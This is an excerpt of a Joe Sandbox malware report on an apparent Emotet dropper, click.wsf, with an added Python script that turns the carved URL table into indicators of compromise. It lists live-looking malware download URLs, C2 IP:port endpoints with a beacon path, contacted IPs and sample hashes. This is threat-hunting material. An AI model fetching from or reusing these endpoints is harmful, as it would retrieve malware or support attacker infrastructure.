  Malicious: false; Avira URL Cloud: malware; Reputation: unknown

https://104.168.155.143:8080/wfqhlvcfruxkwghn/ivirkxueekmcz/
  Source: regsvr32.exe, 00000004.00000002.2661608245.0000000000CD4000, 00000004.00000002.2661608245.0000000000CEB000
  Malicious: false; Avira URL Cloud: malware; Reputation: unknown

http://wrappixels.com/wp-admin/GdIA2oOQEiO5G/dll
  Source: wscript.exe, 00000001.00000002.1551840814.000002D84606B000, 00000001.00000003.1514223112.000002D84605E000
  Malicious: false; Avira URL Cloud: malware; Reputation: unknown

http://ozmeydan.com/cekici/9/xM
  Source: wscript.exe, 00000001.00000003.1417227468.000002D845C90000, 00000001.00000003.1542741778.000002D845C90000
  Malicious: false; Avira URL Cloud: malware; Reputation: unknown

https://104.168.155.143:8080/P
  Source: regsvr32.exe, 00000004.00000002.2661608245.0000000000D58000
  Malicious: false; Avira URL Cloud: malware; Reputation: unknown

https://www.gomespontes.com.br/logs/pd/l
  Source: wscript.exe, 00000001.00000002.1551840814.000002D84606B000, 00000001.00000003.1514223112.000002D84605E000
  Malicious: false; Avira URL Cloud: malware; Reputation: unknown

https://104.168.155.143:8080/
  Source: regsvr32.exe, 00000004.00000002.2661608245.0000000000D58000
  Malicious: false; Avira URL Cloud: malware; Reputation: unknown

https://portalevolucao.com/GerarBoleto/fLIOoFbFs1jHtX/
  Source: wscript.exe, and wscript.exe memory dumps 00000001.00000003.1529404109.000002D8463EE000, 00000001.00000003.1521966849.000002D84626F000, 00000001.00000003.1548494229.000002D846412000, 00000001.00000003.1505842083.000002D845E4E000, 00000001.00000003.1526888779.000002D8462D5000, 00000001.00000003.1526294634.000002D84631A000, 00000001.00000003.1528804146.000002D8462B3000, 00000001.00000002.1552503322.000002D84653C000, 00000001.00000003.1530447488.000002D846461000, 00000001.00000003.1509441394.000002D845E4A000, 00000001.00000003.1507610198.000002D845DF6000, 00000001.00000003.1507946268.000002D845ED2000, 00000001.00000003.1548494229.000002D8463EE000, 00000001.00000003.1504930637.000002D8466C5000, 00000001.00000003.1514390296.000002D84600D000, 00000001.00000003.1507946268.000002D845EB1000, 00000001.00000003.1511499007.000002D845F4D000, 00000001.00000003.1527492027.000002D846291000, 00000001.00000003.1519488621.000002D846065000, 00000001.00000003.1507946268.000002D845E94000
  Malicious: true; Avira URL Cloud: malware; Reputation: unknown

http://wrappixels.com/wp-admin/GdIA2oOQEiO5G/zM
  Source: wscript.exe, 00000001.00000003.1417227468.000002D845C90000
  Malicious: false; Avira URL Cloud: malware; Reputation: unknown

https://160.16.142.56:8080/
  Source: regsvr32.exe, 00000004.00000002.2661608245.0000000000D6A000, 00000004.00000002.2661608245.0000000000D51000
  Malicious: false; Avira URL Cloud: safe; Reputation: unknown

https://91.121.146.47:8080/wfqhlvcfruxkwghn/ivirkxueekmcz/
  Source: regsvr32.exe, 00000004.00000002.2660986060.0000000000C99000
  Malicious: false; Avira URL Cloud: malware; Reputation: unknown

https://penshorn.org/admin/Ses8712iGR8du/95DC4.tmp.dll(
  Source: wscript.exe, 00000001.00000002.1551840814.000002D84606B000, 00000001.00000003.1514223112.000002D84605E000
  Malicious: false; Avira URL Cloud: malware; Reputation: unknown

https://www.gomespontes.com.br/logs/pd/0w
  Source: wscript.exe, 00000001.00000003.1541349732.000002D846702000, 00000001.00000002.1553706057.000002D84672F000
  Malicious: false; Avira URL Cloud: malware; Reputation: unknown

http://softwareulike.com/cWIYxWMPkK/_
  Source: wscript.exe, 00000001.00000003.1417301254.000002D845C83000
  Malicious: false; Avira URL Cloud: malware; Reputation: unknown

https://160.16.142.56:8080/)
  Source: regsvr32.exe, 00000004.00000002.2661608245.0000000000D51000
  Malicious: false; Avira URL Cloud: safe; Reputation: unknown

https://bbvoyage.com/useragreement/ElKHvb4QIQqSrh6Hqm/476
  Source: wscript.exe, 00000001.00000003.1531992780.000002D8464BA000, 00000001.00000002.1552238532.000002D8464BB000
  Malicious: true; Avira URL Cloud: malware; Reputation: unknown
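The table above mixes three things a hunter needs to separate: stage-one download URLs (strings in wscript.exe memory, where click.wsf fetched the DLL), C2 endpoints (strings in regsvr32.exe memory, where the loaded DLL beacons) and carving residue (trailing characters after the last slash, and the truncated host wrappixels.co). The Python below is an added example, not part of the Joe Sandbox report: it normalises a constructed subset of the rows above into per-endpoint IOCs and picks out the URI shared across C2 hosts. The URL text and process attribution in ROWS are copied from the table; the two rules that characters after the last slash are residue and that a host which is a strict prefix of another observed host is a truncated carve are assumptions about how the sandbox extracts strings.

```python
"""Normalise the string-carved URL table of this report into per-endpoint IOCs.

Added example, not from the Joe Sandbox report. ROWS copies a subset of the
report's URL/source rows; the residue-stripping and prefix-truncation rules
are assumptions about the sandbox's string carving.
"""
import ipaddress
from collections import defaultdict
from dataclasses import dataclass, field
from urllib.parse import urlsplit

# The stage follows from the process whose memory held the string: wscript.exe
# runs click.wsf and downloads the DLL, regsvr32.exe hosts the DLL and beacons.
STAGE_BY_PROCESS = {"wscript.exe": "stage1-download", "regsvr32.exe": "c2"}

ROWS = [  # (URL as carved, process it was found in); copied from the report's table
    ("http://softwareulike.com/cWIYxWMPkK/", "wscript.exe"),
    ("http://softwareulike.com/cWIYxWMPkK/yM", "wscript.exe"),
    ("http://wrappixels.co", "wscript.exe"),  # carve stopped one byte short of the host
    ("http://wrappixels.com/wp-admin/GdIA2oOQEiO5G/H#K#0", "wscript.exe"),
    ("http://wrappixels.com/wp-admin/GdIA2oOQEiO5G/", "wscript.exe"),
    ("https://penshorn.org/admin/Ses8712iGR8du/95DC4.tmp.dll(", "wscript.exe"),
    ("https://www.gomespontes.com.br/logs/pd/vM", "wscript.exe"),
    ("https://www.gomespontes.com.br/", "wscript.exe"),
    ("https://160.16.142.56:8080/wfqhlvcfruxkwghn/ivirkxueekmcz/", "regsvr32.exe"),
    ("https://160.16.142.56:8080/)", "regsvr32.exe"),
    ("https://66.228.32.31:7080/wfqhlvcfruxkwghn/ivirkxueekmcz/.DLL", "regsvr32.exe"),
    ("https://187.63.160.88:80/wfqhlvcfruxkwghn/ivirkxueekmcz/VnX", "regsvr32.exe"),
    ("https://164.90.222.65/)", "regsvr32.exe"),
    ("https://104.168.155.143:8080/", "regsvr32.exe"),
]


@dataclass
class Endpoint:
    scheme: str
    host: str
    port: int
    is_ip: bool
    stages: set = field(default_factory=set)
    paths: set = field(default_factory=set)

    @property
    def nonstandard_port(self) -> bool:
        return self.port not in (80, 443)


def canonical_path(path: str) -> str:
    """Keep the directory part only; drops residue such as 'vM', 'VnX' or '95DC4.tmp.dll('."""
    return path[: path.rfind("/") + 1] or "/"


def parse_row(url: str, proc: str):
    parts = urlsplit(url)  # '#K#0' becomes a fragment and is ignored
    host = parts.hostname
    port = parts.port or (443 if parts.scheme == "https" else 80)
    try:
        ipaddress.ip_address(host)
        is_ip = True
    except ValueError:
        is_ip = False
    return parts.scheme, host, port, is_ip, canonical_path(parts.path), STAGE_BY_PROCESS.get(proc, "unknown")


def normalise(rows):
    """Group rows by host:port, dropping hosts that are a strict prefix of another host."""
    parsed = [parse_row(url, proc) for url, proc in rows]
    hosts = {p[1] for p in parsed}
    truncated = {h for h in hosts if any(o != h and o.startswith(h) for o in hosts)}
    endpoints = {}
    for scheme, host, port, is_ip, path, stage in parsed:
        if host in truncated:
            continue
        ep = endpoints.setdefault(f"{host}:{port}", Endpoint(scheme, host, port, is_ip))
        ep.paths.add(path)
        ep.stages.add(stage)
    return endpoints


def shared_c2_paths(endpoints, min_hosts=2):
    """Non-root paths seen on at least min_hosts distinct C2 hosts: the beacon URI pattern."""
    hosts_by_path = defaultdict(set)
    for ep in endpoints.values():
        if "c2" in ep.stages:
            for p in ep.paths:
                if p != "/":
                    hosts_by_path[p].add(ep.host)
    return {p: h for p, h in hosts_by_path.items() if len(h) >= min_hosts}


if __name__ == "__main__":
    eps = normalise(ROWS)
    for key, ep in sorted(eps.items()):
        print(f"{'/'.join(sorted(ep.stages)):16} {ep.scheme}://{key:28} ip={ep.is_ip!s:5} "
              f"nonstd_port={ep.nonstandard_port!s:5} paths={sorted(ep.paths)}")
    print("shared C2 URI:", shared_c2_paths(eps))
```

The prefix rule is deliberately narrow: it only removes a host when a longer host in the same table starts with it, so www.gomespontes.com.br and gomespontes.com.br, which are both real, survive. The port is kept as written rather than inferred from the scheme, which is why 187.63.160.88 comes out as https on port 80, exactly as the report lists it.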
Contacted IPs
IP               Domain              Country            ASN     ASN name                                          Malicious
52.109.13.63     unknown             United States      8075    MICROSOFT-CORP-MSN-AS-BLOCKUS                     false
110.232.117.186  unknown             Australia          56038   RACKCORP-APRackCorpAU                             true
103.132.242.26   unknown             India              45117   INPL-IN-APIshansNetworkIN                         true
104.168.155.143  unknown             United States      54290   HOSTWINDSUS                                       true
79.137.35.198    unknown             France             16276   OVHFR                                             true
115.68.227.76    unknown             Korea Republic of  38700   SMILESERV-AS-KRSMILESERVKR                        true
163.44.196.120   unknown             Singapore          135161  GMO-Z-COM-THGMO-ZcomNetDesignHoldingsCoLtdSG      true
206.189.28.199   unknown             United States      14061   DIGITALOCEAN-ASNUS                                true
31.31.196.172    bbvoyage.com        Russian Federation 197695  AS-REGRU                                          true
186.202.153.5    gomespontes.com.br  Brazil             27715   LocawebServicosdeInternetSABR                     true
203.26.41.131    penshorn.org        Australia          38719   DREAMSCAPE-AS-APDreamscapeNetworksLimitedAU       true
107.170.39.149   unknown             United States      14061   DIGITALOCEAN-ASNUS                                true
66.228.32.31     unknown             United States      63949   LINODE-APLinodeLLCUS                              true
197.242.150.244  unknown             South Africa       37611   AfrihostZA                                        true
185.4.135.165    unknown             Greece             199246  TOPHOSTGR                                         true
183.111.227.137  unknown             Korea Republic of  4766    KIXS-AS-KRKoreaTelecomKR                          true
45.176.232.124   unknown             Colombia           267869  CABLEYTELECOMUNICACIONESDECOLOMBIASASCABLETELCOC  true
169.57.156.166   unknown             United States      36351   SOFTLAYERUS                                       true
164.68.99.3      unknown             Germany            51167   CONTABODE                                         true
139.59.126.41    unknown             Singapore          14061   DIGITALOCEAN-ASNUS                                true
167.172.253.162  unknown             United States      14061   DIGITALOCEAN-ASNUS                                true
167.172.199.165  unknown             United States      14061   DIGITALOCEAN-ASNUS                                true
202.129.205.3    unknown             Thailand           45328   NIPA-AS-THNIPATECHNOLOGYCOLTDTH                   true
147.139.166.154  unknown             United States      45102   CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC  true
153.92.5.27      unknown             Germany            47583   AS-HOSTINGERLT                                    true
159.65.88.10     unknown             United States      14061   DIGITALOCEAN-ASNUS                                true
172.105.226.75   unknown             United States      63949   LINODE-APLinodeLLCUS                              true
164.90.222.65    unknown             United States      14061   DIGITALOCEAN-ASNUS                                true
213.239.212.5    unknown             Germany            24940   HETZNER-ASDE                                      true
5.135.159.50     unknown             France             16276   OVHFR                                             true
186.194.240.217  unknown             Brazil             262733  NetceteraTelecomunicacoesLtdaBR                   true
119.59.103.152   unknown             Thailand           56067   METRABYTE-TH453LadplacoutJorakhaebuaTH            true
159.89.202.34    unknown             United States      14061   DIGITALOCEAN-ASNUS                                true
91.121.146.47    unknown             France             16276   OVHFR                                             true
160.16.142.56    unknown             Japan              9370    SAKURA-BSAKURAInternetIncJP                       true
201.94.166.162   unknown             Brazil             28573   CLAROSABR                                         true
91.207.28.33     unknown             Kyrgyzstan         39819   PROHOSTKG                                         true
103.75.201.2     unknown             Thailand           133496  CDNPLUSCOLTD-AS-APCDNPLUSCOLTDTH                  true
103.43.75.120    unknown             Japan              20473   AS-CHOOPAUS                                       true
188.44.20.25     unknown             Macedonia          57374   GIV-ASMK                                          true
45.235.8.30      unknown             Brazil             267405  WIKINETTELECOMUNICACOESBR                         true
153.126.146.25   unknown             Japan              7684    SAKURA-ASAKURAInternetIncJP                       true
72.15.201.15     unknown             United States      13649   ASN-VINSUS                                        true
187.63.160.88    unknown             Brazil             28169   BITCOMPROVEDORDESERVICOSDEINTERNETLTDABR          true
82.223.21.224    unknown             Spain              8560    ONEANDONE-ASBrauerstrasse48DE                     true
173.212.193.249  unknown             Germany            51167   CONTABODE                                         true
95.217.221.146   unknown             Germany            24940   HETZNER-ASDE                                      true
149.56.131.28    unknown             Canada             16276   OVHFR                                             true
182.162.143.56   unknown             Korea Republic of  3786    LGDACOMLGDACOMCorporationKR                       true
1.234.2.232      unknown             Korea Republic of  9318    SKB-ASSKBroadbandCoLtdKR                          true
192.229.221.95   unknown             United States      15133   EDGECASTUS                                        false
129.232.188.93   unknown             South Africa       37153   xneeloZA                                          true
52.109.76.141    unknown             United States      8075    MICROSOFT-CORP-MSN-AS-BLOCKUS                     false
94.23.45.86      unknown             France             16276   OVHFR                                             true
Joe Sandbox Version: 37.0.0 Beryl
Analysis ID: 830321
Start date and time: 2023-03-20 09:06:00 +01:00
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 5m 52s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: defaultwindowsinteractivecookbook.jbs
Analysis system description: Windows 10 64 bit version 1909 (MS Office 2019, IE 11, Chrome 104, Firefox 88, Adobe Reader DC 21, Java 8 u291, 7-Zip)
Number of analysed new started processes: 6
Number of new started drivers analysed: 0
Number of existing processes analysed: 1
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample file name: click.wsf
Detection: MAL
Classification: mal100.troj.evad.winWSF@5/8@3/54
        EGA Information:
        • Successful, ratio: 100%
        HDC Information:
        • Successful, ratio: 50.2% (good quality ratio 42.4%)
        • Quality average: 60.5%
        • Quality standard deviation: 35.6%
        HCA Information:
        • Successful, ratio: 80%
        • Number of executed functions: 15
        • Number of non-executed functions: 135
        Cookbook Comments:
        • Found application associated with file extension: .wsf
        • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, svchost.exe
        • Excluded IPs from analysis (whitelisted): 93.184.221.240, 8.253.95.121, 8.241.121.126, 8.241.123.126, 8.248.135.254, 67.27.234.126
        • Excluded domains from analysis (whitelisted): fg.download.windowsupdate.com.c.footprint.net, login.live.com, wu.ec.azureedge.net, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, ctldl.windowsupdate.com, wu-bg-shim.trafficmanager.net, wu.azureedge.net
        • Report size getting too big, too many NtAllocateVirtualMemory calls found.
        • Report size getting too big, too many NtOpenKeyEx calls found.
        • Report size getting too big, too many NtProtectVirtualMemory calls found.
        • Report size getting too big, too many NtQueryValueKey calls found.
Time / Type / Description:
• 09:06:48, API Interceptor, 2x Sleep call for process: wscript.exe modified
• 09:07:20, API Interceptor, 8x Sleep call for process: regsvr32.exe modified
Match / Associated Sample Name / URL / Detection / Threat Name:
Match: 52.109.13.63
• https://wy3k.adj.st/deeplink_default_appopen?adj_t=om3pxuk_zgvu7py&adj_campaign=branded_app_collateral_socal-la_sp21-5147&adj_adgroup=prov_socal-la_all_email&adj_creative=tickler-all-others&adj_fallback=https%3a%2f%2f22rkb9.codesandbox.io?gq=Y2xlYWh5QGhhcnJpc3dpbGxpYW1zLmNvbQ==, Detection: malicious, Threat Name: HTMLPhisher
• script.ps1, Detection: malicious, Threat Name: Qbot
• https://uoe-my.sharepoint.com/:o:/g/personal/s2151826_ed_ac_uk/EiPbnSU15bJOkC7l4WxhV6AByYfAdUA_gJQfZBOPJcLdUA?e=bXwVkR, Detection: malicious, Threat Name: HTMLPhisher
• https://eurofinsgenomics.com/handlers/sitenavigator.aspx?returnurl=https://joyaconstructora.com%2F%2F%2F%2F%2F%2F%2F%2F/auth/%2F%2F%2F%2F/l8vf5r%2F%2F%2F%2Fno.scammer@nope.com, Detection: malicious, Threat Name: HTMLPhisher
• http://45.50.233.214:443, Detection: malicious, Threat Name: Unknown
• ID-FACT.1678955800.zip, Detection: malicious, Threat Name: Unknown
• http://www.gerardosmarketplace.com, Detection: malicious, Threat Name: Unknown
• Agreement_138439_Mar4.zip, Detection: malicious, Threat Name: Qbot
• PO-465514-180820.doc.zip, Detection: malicious, Threat Name: Unknown
• 20230314_170734_96KdjxuP4otsx8GvtUhxd7dKxlCZ9X3d.eml, Detection: malicious, Threat Name: HTMLPhisher
• https://zsyqplxqhppbvzsqnfap7te6tabckg3sq3wfqkmbjymzhvyu-ipfs-dweb-link.translate.goog/alldomail.html?_x_tr_hp=bafybeibmec&_x_tr_sl=auto&_x_tr_tl=en&_x_tr_hl=en&_x_tr_pto=wapp#test@test.com, Detection: malicious, Threat Name: HTMLPhisher
• dominos.com.my Expired Password Notification.msg, Detection: malicious, Threat Name: Unknown
• EFT PaymentsEQSKRPJHR-135711.msg, Detection: malicious, Threat Name: HTMLPhisher
• Quia.html, Detection: malicious, Threat Name: Qbot
• RECIBO MTCN.rar, Detection: malicious, Threat Name: FormBook
• Quidem.html, Detection: malicious, Threat Name: HtmlDropper
• #Ufe0fATT53546789b.htm, Detection: malicious, Threat Name: HTMLPhisher
• DocumentVaudoise.html, Detection: malicious, Threat Name: Unknown
• https://isonglobal-my.sharepoint.com/, Detection: malicious, Threat Name: Unknown
• https://tinker.canksru.ru/Mjjohnson@edgewortheconomics.com, Detection: malicious, Threat Name: Unknown
Match / Associated Sample Name / URL / Detection / Threat Name / Context:
Match: bbvoyage.com
• Form - 16 Mar, 2023.one, Detection: malicious, Threat Name: Emotet, Context: 31.31.196.172
Match: penshorn.org
• Form - 16 Mar, 2023.one, Detection: malicious, Threat Name: Emotet, Context: 203.26.41.131
• MBQ24253060297767042_202303161424.one, Detection: malicious, Threat Name: Emotet, Context: 203.26.41.131
• iMedPub_LTD_4.one, Detection: malicious, Threat Name: Emotet, Context: 203.26.41.131
• iMedPub_LTD_6.one, Detection: malicious, Threat Name: Emotet, Context: 203.26.41.131
• INNOVINC.one, Detection: malicious, Threat Name: Emotet, Context: 203.26.41.131
• Insight_Medical_Publishing_2.one, Detection: malicious, Threat Name: Emotet, Context: 203.26.41.131
• Insight_Medical_Publishing_1.one, Detection: malicious, Threat Name: Emotet, Context: 203.26.41.131
• Insight_Medical_Publishing_3.one, Detection: malicious, Threat Name: Emotet, Context: 203.26.41.131
• Insight_Medical_Publishing_4.one, Detection: malicious, Threat Name: Emotet, Context: 203.26.41.131
• OMICS_Online_1.one, Detection: malicious, Threat Name: Emotet, Context: 203.26.41.131
• Insight_Medical_Publishing.one, Detection: malicious, Threat Name: Emotet, Context: 203.26.41.131
• Omics_Journal.one, Detection: malicious, Threat Name: Emotet, Context: 203.26.41.131
• OMICS.one, Detection: malicious, Threat Name: Emotet, Context: 203.26.41.131
• OPAST_GROUP_1.one, Detection: malicious, Threat Name: Emotet, Context: 203.26.41.131
• OPAST_GROUP_LLC.one, Detection: malicious, Threat Name: Emotet, Context: 203.26.41.131
• OPAST_GROUP.one, Detection: malicious, Threat Name: Emotet, Context: 203.26.41.131
• Opast_International.one, Detection: malicious, Threat Name: Emotet, Context: 203.26.41.131
• opastonline.com.one, Detection: malicious, Threat Name: Emotet, Context: 203.26.41.131
• Opast_Publishing_Group_1.one, Detection: malicious, Threat Name: Emotet, Context: 203.26.41.131
• Opast_Publishing_Group.one, Detection: malicious, Threat Name: Emotet, Context: 203.26.41.131
Match / Associated Sample Name / URL / Detection / Threat Name / Context:
Match: MICROSOFT-CORP-MSN-AS-BLOCKUS
• https://lp.constantcontactpages.com/cu/YWZoQqo, Detection: malicious, Threat Name: HTMLPhisher, Context: 52.109.76.141
• https://ipfs.io/ipfs/bafybeieqwjihauwgqt7xc6em5fjahc6wprftgeacb4ba3nfn6hk5c5lgky/chenjeffente_cham_ev14.html#for.transition.support@casa.gov.au, Detection: malicious, Threat Name: Unknown, Context: 52.109.76.141
• #Ud83d#Udce7#U2122 Payment Advice Note-05318.htm, Detection: malicious, Threat Name: HTMLPhisher, Context: 52.109.32.24
• #Ud83d#Udce7#U2122 Payment Advice Note-05318.htm, Detection: malicious, Threat Name: HTMLPhisher, Context: 52.109.32.24
• oXMenI45tQ.exe, Detection: malicious, Threat Name: FormBook, Context: 20.216.185.237
• MS.Update.Center.Security.KB464397.msi, Detection: malicious, Threat Name: Unknown, Context: 52.109.76.141
• Win10.Update-kb8723467.msi, Detection: malicious, Threat Name: Unknown, Context: 52.109.13.64
• https://rheba218.softr.app/, Detection: malicious, Threat Name: HTMLPhisher, Context: 52.109.32.24
• ORr6fNn67s.exe, Detection: malicious, Threat Name: Amadey, Babuk, Djvu, SmokeLoader, Vidar, Context: 20.189.173.20
• x86_64.elf, Detection: malicious, Threat Name: Mirai, Moobot, Context: 52.244.252.204
• dupa.ps1, Detection: malicious, Threat Name: Unknown, Context: 52.109.76.141
• lHb3Vvmlxg.elf, Detection: malicious, Threat Name: Mirai, Context: 163.228.43.5
• Q5QuwXOwrT.elf, Detection: malicious, Threat Name: Mirai, Context: 155.62.200.99
• setup.exe, Detection: malicious, Threat Name: Amadey, Djvu, RHADAMANTHYS, SmokeLoader, Vidar, Context: 20.189.173.20
• setup.exe, Detection: malicious, Threat Name: Amadey, Babuk, Djvu, Fabookie, RedLine, SmokeLoader, Vidar, Context: 20.42.65.92
• setup.exe, Detection: malicious, Threat Name: Amadey, Djvu, Fabookie, RHADAMANTHYS, SmokeLoader, Vidar, Context: 104.208.16.94
• setup.exe, Detection: malicious, Threat Name: Amadey, Djvu, SmokeLoader, Vidar, Context: 20.189.173.20
• bNQF3pHHKw.elf, Detection: malicious, Threat Name: Mirai, Context: 22.66.9.58
• CP8IIerCXD.elf, Detection: malicious, Threat Name: Mirai, Context: 22.171.139.219
• yGJHQ8Sasb.elf, Detection: malicious, Threat Name: Mirai, Context: 20.209.183.200
Match / Associated Sample Name / URL / Detection / Threat Name / Context:
Match: 72a589da586844d7f0818ce684948eea
• aOHLlvfakv.dll, Detection: malicious, Threat Name: Emotet, Context: 164.90.222.65
• aOHLlvfakv.dll, Detection: malicious, Threat Name: Emotet, Context: 164.90.222.65
• PO0000001552.xls, Detection: malicious, Threat Name: Emotet, Context: 164.90.222.65
• W-9 form.zip, Detection: malicious, Threat Name: Emotet, Context: 164.90.222.65
• U_0211.zip, Detection: malicious, Threat Name: Emotet, Context: 164.90.222.65
• cdmwqddqir.exe, Detection: malicious, Threat Name: Trickbot, Context: 164.90.222.65
• roben.dll, Detection: malicious, Threat Name: Trickbot, Context: 164.90.222.65
• c85WWDlKf2.dll, Detection: malicious, Threat Name: Trickbot, Context: 164.90.222.65
• WLBu7dTvsC.dll, Detection: malicious, Threat Name: Trickbot, Context: 164.90.222.65
• SecuriteInfo.com.Trojan.GenericKDZ.80412.21668.dll, Detection: malicious, Threat Name: Trickbot, Context: 164.90.222.65
• ZokRhfJSrx.exe, Detection: malicious, Threat Name: Trickbot, Context: 164.90.222.65
• 84NKc3571B.exe, Detection: malicious, Threat Name: Trickbot, Context: 164.90.222.65
• SecuriteInfo.com.ML.PE-A.26667.dll, Detection: malicious, Threat Name: TrickBot, Context: 164.90.222.65
• HOPdc7v13C.exe, Detection: malicious, Threat Name: TrickBot, Context: 164.90.222.65
• soccer.png.dll, Detection: malicious, Threat Name: TrickBot, Context: 164.90.222.65
• SXCjsXDXXU.exe, Detection: malicious, Threat Name: TrickBot, Context: 164.90.222.65
• dngqoAXyDd.exe, Detection: malicious, Threat Name: TrickBot, Context: 164.90.222.65
• nWKik9o8eY.exe, Detection: malicious, Threat Name: TrickBot, Context: 164.90.222.65
• 5zzdHIYZAG.exe, Detection: malicious, Threat Name: TrickBot, Context: 164.90.222.65
• r433fCa9zW.exe, Detection: malicious, Threat Name: TrickBot, Context: 164.90.222.65
Match / Associated Sample Name / URL / Detection / Threat Name:
Match: C:\Users\user\Desktop\rad75349.tmp.dll
• Form - 16 Mar, 2023.one, Detection: malicious, Threat Name: Emotet
• MBQ24253060297767042_202303161424.one, Detection: malicious, Threat Name: Emotet
• iMedPub_LTD_4.one, Detection: malicious, Threat Name: Emotet
• iMedPub_LTD_6.one, Detection: malicious, Threat Name: Emotet
• INNOVINC.one, Detection: malicious, Threat Name: Emotet
• Insight_Medical_Publishing_2.one, Detection: malicious, Threat Name: Emotet
• Insight_Medical_Publishing_1.one, Detection: malicious, Threat Name: Emotet
• Insight_Medical_Publishing_3.one, Detection: malicious, Threat Name: Emotet
• Insight_Medical_Publishing_4.one, Detection: malicious, Threat Name: Emotet
• OMICS_Online_1.one, Detection: malicious, Threat Name: Emotet
• Insight_Medical_Publishing.one, Detection: malicious, Threat Name: Emotet
• Omics_Journal.one, Detection: malicious, Threat Name: Emotet
• OMICS.one, Detection: malicious, Threat Name: Emotet
• OPAST_GROUP_1.one, Detection: malicious, Threat Name: Emotet
• OPAST_GROUP_LLC.one, Detection: malicious, Threat Name: Emotet
• OPAST_GROUP.one, Detection: malicious, Threat Name: Emotet
• Opast_International.one, Detection: malicious, Threat Name: Emotet
• opastonline.com.one, Detection: malicious, Threat Name: Emotet
• Opast_Publishing_Group_1.one, Detection: malicious, Threat Name: Emotet
• Opast_Publishing_Group.one, Detection: malicious, Threat Name: Emotet
Process: C:\Windows\System32\regsvr32.exe
File Type: Microsoft Cabinet archive data, Windows 2000/XP setup, 62582 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
Category: dropped
Size (bytes): 62582
Entropy (8bit): 7.996063107774368
Encrypted: true
SSDEEP: 1536:Jk3XPi43VgGp0gB2itudTSRAn/TWTdWftu:CHa43V5p022iZ4CgA
MD5: E71C8443AE0BC2E282C73FAEAD0A6DD3
SHA1: 0C110C1B01E68EDFACAEAE64781A37B1995FA94B
SHA-256: 95B0A5ACC5BF70D3ABDFD091D0C9F9063AA4FDE65BD34DBF16786082E1992E72
SHA-512: B38458C7FA2825AFB72794F374827403D5946B1132E136A0CE075DFD351277CF7D957C88DC8A1E4ADC3BCAE1FA8010DAE3831E268E910D517691DE24326391A6
Malicious: false
Reputation: moderate, very likely benign file
                                                                                        Preview:MSCF....v.......,...................I.................BVrl .authroot.stl....oJ5..CK..8U....a..3.1.P. J.".t..2F2e.dHH......$E.KB.2D..-SJE....^..'..y.}..,{m.....\...]4.G.......h....148...e.gr.....48:.L...g.....Xef.x:..t...J...6-....kW6Z>....&......ye.U.Q&z:.vZ..._....a...]..T.E.....B.h.,...[....V.O.3..EW.x.?.Q..$.@.W..=.B.f..8a.Y.JK..g./%p..C.4CD.s..Jd.u..@.g=...a.. .h%..'.xjy7.E..\.....A..':.4TdW?Ko3$.Hg.z.d~....../q..C.....`...A[ W(.........9...GZ.;....l&?........F...p?... .p.....{S.L4..v.+...7.T?.....p..`..&..9.......f...0+.L.....1.2b)..vX5L'.~....2vz.,E.Ni.{#...o..w.?.#.3..h.v<.S%.].tD@!Le.w.q.7.8....QW.FT.....hE.........Y............./.%Q...k...*.Y.n..v.A..../...>B..5\..-Ko.......O<.b.K.{.O.b...._.7...4.;%9N..K.X>......kg-9..r.c.g.G|.*[.-...HT...",?.q...ad....7RE.......!f..#../....?.-.^.K.c^...+{.g......]<..$.=.O....ii7.wJ+S..Z..d.....>..J*...T..Q7..`.r,<$....\d:K`..T.n....N.....C..j.;.1SX..j....1...R....+....Yg....]....3..9..S..D..`.
Process: C:\Windows\System32\regsvr32.exe
File Type: data
Category: modified
Size (bytes): 328
Entropy (8bit): 3.127437612314223
Encrypted: false
SSDEEP: 6:kKnMAry/7UN+SkQlPlEGYRMY9z+4KlDA3RUecZUt:PMoCvkPlE99SNxAhUext
MD5: DB2EC1D25EBBF63A67B76A991DE9381B
SHA1: ED66F35D9308016B4F276CC09C3B2116669070E5
SHA-256: E7E343FE929301E443F44F2842348A4875C87ABD0CF3B2F29403C96A660344AA
SHA-512: 03D7D4AE006B25E50EA4F98ADD852997D7E11A6064AE0334A2BA0D0056E15F5C432990EDC79FA4C00F57A0A44C71982DC302636E17F46A95CAE85814AF7400FC
Malicious: false
                                                                                        Preview:p...... ........Z.L..[..(....................................................... ..........).K......&...........v...h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.d.2.f.9.2.9.a.7.4.b.d.9.1.:.0."...
Process: C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE
File Type: old-fs dump file (16-bit, assuming PDP-11 endianness), Previous dump Thu Jan 1 01:07:36 1970, This dump Thu Jan 1 01:09:04 1970,
Category: modified
Size (bytes): 8192
Entropy (8bit): 4.3056677894243895
Encrypted: false
SSDEEP: 48:oG+4F4x8t4OU4oxJN4rXVJVpV+VuVSV1y8wfZu+E+d2nYgFxvZPEGsj6xYw6vMI:TU8c9dK2nrFrTCMI
MD5: 8A4B17DA69383C75316D7488A1F36DEB
SHA1: 04AA89B2ECD1EA38D81AD9865450CF02F9A709C5
SHA-256: 882EE2DE3174D9BA48B2B58B5ACEA99F69EB8D5594F7ED2DD5C6C7FA47B71B2A
SHA-512: E397B0E0D7701583A8E2CCD097E78A881C826B7DC0696595107657DEDEF826FAED3D522C80605ED83B7119081667DA58730A65BFE6828C25BF7E02404AD8A654
Malicious: false
